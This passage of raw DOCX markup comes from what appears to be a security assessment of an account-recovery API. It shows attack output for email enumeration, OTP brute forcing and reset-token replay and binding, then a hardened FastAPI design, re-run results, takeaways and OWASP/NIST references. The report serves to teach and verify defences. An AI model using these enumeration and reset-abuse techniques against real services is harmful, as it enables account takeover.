        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8640"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8640"/>
            <w:shd w:val="clear" w:fill="F4F5F7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    victim@corp.example      -&gt; HTTP 200 EXISTS   {"status":"recovery email sent"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    root@corp.example        -&gt; HTTP 200 EXISTS   {"status":"recovery email sent"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    ceo@corp.example         -&gt; HTTP 404 absent   {"error":"no account with that email"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    nobody@nowhere.test      -&gt; HTTP 404 absent   {"error":"no account with that email"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    known   (victim@corp.example   ) ~    6.85 ms</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    unknown (nobody@nowhere.test   ) ~    7.50 ms</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[+] ATTACKER GAIN - confirmed which emails have accounts, unauthenticated:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0B3D91"/>
        </w:rPr>
        <w:t>5. Hardened Implementation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>The hardened build (hardened/hardened_account_recovery.py, FastAPI) keeps the same endpoints and port so the eight scripts run unmodified. Each fix, with its tradeoff:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">#1 Enrollment enumeration — </w:t>
      </w:r>
      <w:r>
        <w:t>One generic response whether or not the account exists; a verification/notice email is sent either way. Tradeoff: worse inline signup UX — a returning user is not told 'email taken' on the page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">#2 Mass assignment — </w:t>
      </w:r>
      <w:r>
        <w:t>Explicit Pydantic models with an allowlist of settable fields (extra keys ignored). is_admin is set only by the server. Tradeoff: clients sending extra fields get no error; we chose safe-by-default over strict 422s.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">#3 Recovery enumeration — </w:t>
      </w:r>
      <w:r>
        <w:t>forgot-password always returns the same generic message on the same code path with matched work, for known and unknown addresses alike. Tradeoff: users get no inline confirmation their address was recognized.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">#4 Host-header injection — </w:t>
      </w:r>
      <w:r>
        <w:t>Reset URLs are built from a server-side BASE_URL; the Host header is never trusted. Tradeoff: multi-domain deployments must configure BASE_URL per environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">#5 Predictable secrets — </w:t>
      </w:r>
      <w:r>
        <w:t>Token = secrets.token_urlsafe(32); OTP = secrets.randbelow. Tokens are stored SHA-256-hashed, so a DB leak yields no live tokens. Tradeoff: the server cannot display a user's token — by design.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">#6 Replay / lifecycle — </w:t>
      </w:r>
      <w:r>
        <w:t>Short TTL (15 min), single-use (token deleted on use), and every outstanding token/challenge for the account is invalidated on a successful reset. Tradeoff: multiple pending reset emails all die on first use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">#7 Rate limit / lockout — </w:t>
      </w:r>
      <w:r>
        <w:t>Per-account attempt cap with lockout plus a per-IP sliding-window throttle on verify-otp and reset-password. Tradeoff: shared-NAT IPs can throttle innocent users, so this pairs with per-account limits, not IP alone.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">#8 Account binding — </w:t>
      </w:r>
      <w:r>
        <w:t>The reset target is derived ONLY from the token record; ResetIn has no client email field. This holds even if the token were guessable. Tradeoff: none of note — it is strictly more correct.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Baseline hygiene — </w:t>
      </w:r>
      <w:r>
        <w:t>Passwords hashed with Argon2id (argon2-cffi) since the reset path writes new passwords; login uses constant-time verify with a dummy-hash path for missing accounts.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Verification — attacks re-run against the hardened build (default secure mode):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#2 (hardened):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8640"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8640"/>
            <w:shd w:val="clear" w:fill="F4F5F7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[*] Honest signup   -&gt; HTTP 200: {"status":"if this is a new account, a verification email has been sent"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[*] Malicious signup-&gt; HTTP 200: {"status":"if this is a new account, a verification email has been sent"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    honest_user is_admin = False</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    mallory     is_admin = False</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[-] Escalation did NOT occur - target does not appear vulnerable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#7 (hardened):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8640"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8640"/>
            <w:shd w:val="clear" w:fill="F4F5F7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    sent 3000 wrong OTPs</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    status codes returned: {400: 4, 429: 2996}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    HTTP 429 (rate limited)? YES</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#1 (hardened):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8640"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8640"/>
            <w:shd w:val="clear" w:fill="F4F5F7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    usernames that exist: []</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    emails that exist:    []</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1B5E20"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#3 (hardened):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8640"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8640"/>
            <w:shd w:val="clear" w:fill="F4F5F7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[+] ATTACKER GAIN - confirmed which emails have accounts, unauthenticated:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>On-merits proof — the attacker is GENEROUSLY handed real, valid tokens (worst case). The lifecycle (#6) and binding (#8) fixes still hold, and legitimate recovery still works:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8640"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8640"/>
            <w:shd w:val="clear" w:fill="F4F5F7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>reset via link token -&gt; 200 {'status': 'password reset', 'account': 'alice@corp.example'}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>login with new password -&gt; {'status': 'ok', 'username': 'alice', 'is_admin': False}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>use #1 (legitimate) -&gt; 200 {'status': 'password reset', 'account': 'victim@corp.example'}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>use #2 REPLAY same token -&gt; 400 {'error': 'invalid or expired token'}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>login with replayed pw ? -&gt; False (False = replay blocked)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>older sibling token after a completed reset -&gt; 400 {'error': 'invalid or expired token'} (400 = all tokens invalidated)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>reset attempt with 'email':'root@corp.example' -&gt; 200 {'status': 'password reset', 'account': 'mallory@evil.example'}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  -&gt; note 'account' in the response is the TOKEN's owner, not root</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>login root with 'pwned' ? -&gt; False (False = root untouched)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>login root with original admin pw ? -&gt; True (True = still intact)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>login mallory with 'pwned' (her OWN reset applied) ? -&gt; True (True = only her account changed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555555"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Note on reading the output: the attack scripts print a fixed 'ATTACKER GAIN' epilogue regardless of outcome — they assume the vulnerability is present. Against the hardened build that canned line still prints, but the measured data (found: [], is_admin=False, 429 lockout, 400/401/422 on resets) is what establishes the defense.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0B3D91"/>
        </w:rPr>
        <w:t>6. Key Takeaways</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Treat recovery as a credential-issuing path. </w:t>
      </w:r>
      <w:r>
        <w:t>Recovery is authentication. A forgot-password flow mints credentials; it deserves the same rigor as login, MFA, and session issuance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization must come from the server-held object. </w:t>
      </w:r>
      <w:r>
        <w:t>Bind the action to the token, never to client input. The single most damaging bug here (#8) was one line trusting a client 'email' over the token's owner.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Entropy is necessary, not sufficient. </w:t>
      </w:r>
      <w:r>
        <w:t>A perfect token still fails if the flow logic is wrong. #8 works against cryptographically strong tokens; #6 defeats a strong token by replaying it. Lifecycle and binding matter as much as entropy.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Trust boundaries are the theme. </w:t>
      </w:r>
      <w:r>
        <w:t>Never build security-relevant URLs, targets, or privileges from request-controlled input — Host headers (#4), JSON keys (#2), or reset targets (#8).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">The fixes are cheap and well-known. </w:t>
      </w:r>
      <w:r>
        <w:t>Generic responses and identical code paths close enumeration (#1, #3); short-lived, single-use, hashed, fully-invalidated tokens close the lifecycle (#5, #6); per-account lockout closes brute force (#7).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0B3D91"/>
        </w:rPr>
        <w:t>7. References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>OWASP Application Security Verification Standard (ASVS) v4.0 — §2 Authentication, §2.5 Credential Recovery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>OWASP Cheat Sheet Series — 'Forgot Password' and 'Credential Stuffing Prevention'.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>NIST SP 800-63B, Digital Identity Guidelines — memorized secrets, look-up secrets, and rate-limiting / throttling (§5.1, §5.2.2).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CWE-640: Weak Password Recovery Mechanism for Forgotten Password.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CWE-620: Unverified Password Change.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CWE-644: Improper Neutralization of HTTP Headers for Scripting Syntax (Host header).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
